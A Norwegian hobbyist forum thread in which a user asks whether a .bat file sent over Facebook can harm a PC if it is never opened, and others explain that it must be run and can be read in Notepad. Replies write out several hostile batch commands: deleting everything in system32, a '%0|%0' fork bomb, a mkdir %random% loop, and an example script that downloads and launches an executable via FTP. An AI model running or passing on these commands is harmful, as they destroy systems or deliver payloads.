Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  22 2544
Heisann, jeg har bare et lite spørsmål. Om noen feks har lyst til å ødelegge pcn min/hacke den ved å sende meg en bat fil. Er det ikke noe jeg kan gjøre for å stoppe det? Blir pcn ødelagt uansett om jeg åpner filen eller ikke? Setter pris på raske svar!
Måken's Aspirant
Fleff's Avatar
Donor
batch har sine limiteringer, om du er redd for at noen skal ødelegge systemet ditt, så er batch noe av det siste du bør frykte.

Bruk et godt anti-virus, så er du godt igang, vært også litt kritisk til filer du laster ned, og ikke minst åpner.
Det er nok slik at du må kjøre filen for at den skal kunne gjøre noe som helst. Men all den tid det er en tekstfil, så kan du åpne den i notepad.
Spørs vel hva bat fila er lagd for å gjøre?
Antivirus og la vær å åpne den vel....
Trådstarter
2 0
Nei, la oss si at jeg hadde fått tilsendt en bat fil på facebook da, og jeg ikke åpner den. da blir ikke pcn ødelagt/hacka på noen måte? Den må åpnes og lastes ned?

Ooog at det er en skolepc, som man ikke har tilgang til å laste ned noe anti virus programmer på

Bat filen er lagd for å få tilgang til evt mail adresse og andre passord med mer
Måken's Aspirant
Fleff's Avatar
Donor
Bat filer må det, men som meitemark sa, så er det bare å åpne den i fks notepad for å se hva den gjør.
God når det gjelder
Carmex's Avatar
Høyre klikk, åpne i notepad, kopier og post her?
Bat fil er rimelig farlig selv om mange ikke tror det, mange store RAT servere som hjemmer seg i dem. Og til deg pete,
så lenge du ikke kjører filen så blir verken dataen ødelagt eller overvåket, hentet infomasjon ut av.
Derfor jeg alltid kompilerer til .exe haha-

OT: Det er vel bare å ikke kjøre ukjente filer du får tilsendt? problem solved!
Bat-filer er bare scripts. Det vil si at du kan lese det som står i dem, og finne ut hva de gjør. Tviler sterkt på at antivirus vil gjøre noe mot en slik med mindre du kjører den og den laster ned eksterne programmer. Om du vil, gjerne last den ned. Høyreklikk på den, trykk rediger og velg ok hvis det kommer en advarsel. Så kan du dele det med oss Når du redigerer den åpnes note-/wordpad. Copy paste koden hit og slett fila.

Off topic-ish: Derfor visualn00b kompilerer, fordi da kan vi ikke se hva den gjør like enkelt.
Edit: Jeg er nysgjerrig :P Derfor jeg vil se hva som står i den
Sist endret av L33tenGutt; 4. januar 2013 kl. 22:19.
Sitat av L33tenGutt Vis innlegg
Bat-filer er bare scripts.
Vis hele sitatet...
I teorien ja, Men nei. Bat-filer er ikke bare scripts, er fult mulig og skjule en RAT server i en Bat-fil. ''.Bat'' Er bare en type filformat.
Sitat av L3gioN Vis innlegg
I teorien ja, Men nei. Bat-filer er ikke bare scripts, er fult mulig og skjule en RAT server i en Bat-fil. ''.Bat'' Er bare en type filformat.
Vis hele sitatet...
teach me, master
husker en bat fil med:

cd\
cd windows
cd system32
del /F /Q *.*

gjorde susen på å herpe min gamle windows95 installasjon :P

mulig dette ikke fungerer på nyere versjoner av windows men jeg tar ikke sjansen :P
Vi loopa x antall vinduer i batch engang, med et skript.. (max antall windows tillater) og deretter spamma alt a funksjoner du kan tenke deg.
deretter luktet det svidd av pcen...

Laga også en tråd for lenge siden, der vi lagde meny og masse skript i bat + VB :P
Sitat av L33tenGutt Vis innlegg
teach me, master
Vis hele sitatet...
Først, lær deg og bruk Google.
Sitat av L3gioN Vis innlegg
Først, lær deg og bruk Google.
Vis hele sitatet...
Kan ikke du heller si det? Vis meg hvordan man med én .bat-fil klarer å lage en rat. Eneste måten jeg kan tenke meg er å skrive ut en .exe-fil linje for linje, men da er jo ikke rat-en noe særlig bra gjemt. Tenker du på å endre filendelsen på en rat til .bat? Da vil den jo ikke klare å kjøre. Kan du definere "å gjemme en rat i en .bat-fil"? Jeg ser på det som at man gjemmer selve koden eller filen, slik at ved å lese instruksjonene i skriptet ser man ikke kode som f.eks. skriver ut data fra hex til en fil. Jeg tenker på slik man kan gjemme filer i .jpg-bilder. Usynlige med mindre man vet hvordan man finner den.

[COLOR="LemonChiffon"]wi r leigon, we dnt 4giv, dont frgit etc...[/COLOR]
Sitat av L3gioN Vis innlegg
Først, lær deg og bruk Google.
Vis hele sitatet...

Jeg er egentlig litt spent på hvilken "script-kiddie" metode du har funnet for å gjemme en RAT inn i en batch file. Teoretisk så går ikkje det an, med tanke på at batch har sine begrensninger.

Men selvsagt hvis du definerer det å starte en annen kjørbar fil fra batch scriptet som å gjemme, så ja. Eller hvis du bruker batch filen til å skrive kildekoden til en annen fil, for så å kompilere den, og starte den. Så er det mulig ja.

Men begge løsningene er meget upraktiske.
Sist endret av 0xFF; 6. januar 2013 kl. 18:02.
Er ikke interessert i og vise/lære. Værtfall ikke på dette forumet.
Sitat av L3gioN Vis innlegg
Er ikke interessert i og vise/lære. Værtfall ikke på dette forumet.
Vis hele sitatet...
Trudde du var interessert i å forklare. Værtfall det jeg fikk inntrykk av i dine tidligere innlegg.


IT "guru" med ekstra tid til overs?

Sitat av L3gioN Vis innlegg
Om du har noen spørsmål angående hacking i form av RAT(Remote Administration Tool) og diverse andre programer som gjør at du kan hente ut infomasjon, overvåke etc. Så tar jeg gjerne i mot PM.
Vis hele sitatet...
Eller har du ikkje kompetanse innen for feltet?
Sitat av 0xFF Vis innlegg
Trudde du var interessert i å forklare. Værtfall det jeg fikk inntrykk av i dine tidligere innlegg.


IT "guru" med ekstra tid til overs?



Eller har du ikkje kompetanse innen for feltet?
Vis hele sitatet...
Har ingen interesse for og forklare dette over dette forumet. Har ikke sakt det slik i det innlegget at jeg skal forklare dette på forumet. Noe mere du lurer på?.
Slengte sammen noe fort og gale, tenkte det fungerer greit som et eksempel på hvordan man kan gjøre ugang i batch. Merk at det stemmer som sagt tidligere i tråden, man må selv starte batch-fila for at innholdet skal kjøre.

Kode

@echo off
:: FTP server/login.
set ftp_host=ftp.mozilla.org
set ftp_user=anonymous
set ftp_pass=anonymous

:: Sti til filen som skal lastes ned.
set ftp_path=/pub/mozilla.org/firefox/releases/latest/win32/nb-NO/

:: Filnavn på ftp-server.
set ftp_file=Firefox Setup 17.0.1.exe

:: Lokal sti der filen skal lagres.
set local_path=%temp%\

:: Navn som filen skal ha lokalt.
set local_file=setup.exe

:: Navn på lokal tmp-fil.
set tmp_file=%temp%\ftptemp.txt

:: Skriv ftp-informasjon til fil.
echo open %ftp_host%>> %tmp_file%
echo %ftp_user%>> %tmp_file%
echo %ftp_pass%>> %tmp_file%
echo cd %ftp_path%>> %tmp_file%
echo get "%ftp_file%" "%local_path%%local_file%">> %tmp_file%
echo bye>> %tmp_file%

:: Kjør ftp-kommandoene vi skrev til tmp-filen.
ftp -s:%tmp_file%

:: Kjør filen vi lastet ned.
start %local_path%%local_file%

:: Slett tmp-fila.
del %tmp_file%
Tok forøvrig og googlet litt for å finne "RAT in bat file", men kom ikke over noe som helst.

Det nærmeste jeg kom var vel sider som dette
http://ankitthehacker.wordpress.com/...atch-file-new/

Men det er overhodet ikke et RAT, det er et script som oppretter en adminkonto...
Sist endret av norboost; 6. januar 2013 kl. 19:39.
Sitat av norboost Vis innlegg
-masse tekst-

Men det er overhodet ikke et RAT, det er et script som oppretter en adminkonto...
Vis hele sitatet...
Ja, fant den jeg også. Det er forsåvidt en del ugang man kan gjøre med bat-filer, ja %0|%0 er den enkleste måten jeg vet om atm. Men det er mer, som å skrive ut en htm-fil som kjøres fullscreen og ligner på en bsod, eller endre filtype eller navn på alle filer. mkdir %random% kan også brukes til morro om den settes i en loop

Fortsatt spent på om TS vil poste koden, forresten.
▼ ... noen uker senere ... ▼
Ser for meg følgende scenario:

Fade into facebook chat:
<1337h4x0rFr13nd> Owh, i z0 h4ck3d y0|_| n0\/\/. You took the file, and its a sup3r 1337 hax0r batch file. you so fucked now. I pwn j0000!
<OT> Åneiånei, ikke hekk meg.
Fade out into Freak.no
... Resten er historie..